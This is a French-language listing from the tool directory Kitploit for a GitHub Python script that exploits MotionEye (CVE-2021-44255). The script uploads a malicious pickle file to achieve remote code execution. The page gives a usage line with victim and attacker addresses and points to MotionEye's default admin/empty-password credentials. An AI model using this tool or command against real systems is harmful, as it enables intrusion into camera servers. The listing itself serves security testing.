Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
motioneye-authenticated-RCE — Un script Python 3 qui téléverse un fichier tasks.pickle permettant une exécution de code à distance (RCE) dans MotionEye. CVE-2021-44255 | Kitploit
Outils/GitHubGitHub/pizza-power/motioneye-authenticated-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubpizza-power/motioneye-authenticated-rce

motioneye-authenticated-RCE

Un script Python 3 qui téléverse un fichier tasks.pickle permettant une exécution de code à distance (RCE) dans MotionEye. CVE-2021-44255

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
12il y a 3 ansPas encore vérifié

RCE authentifié MotionEye/MotionEyeOS

Un script Python 3 qui téléverse un fichier tasks.pickle permettant une exécution de code à distance (RCE) dans MotionEye. Vous avez besoin des identifiants administrateur, ce ne devrait donc pas être un gros problème. Malheureusement, MotionEye/MotionEyeOS se trouve fréquemment en cours d'exécution avec des identifiants par défaut.

Exemple :

main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444

Où victim et attacker sont au format ip:port, sauf s'il s'agit du port 80. Dans ce cas, le port peut être omis. Ceci utilise le nom d'utilisateur par défaut admin avec un mot de passe vide. Il existe également des options CLI pour des noms d'utilisateurs/mots de passe alternatifs. Veuillez consulter le code pour plus de détails.

CVE-2021-44255

Voir https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye pour une analyse détaillée de ce problème et d'autres.

Télécharger l’outil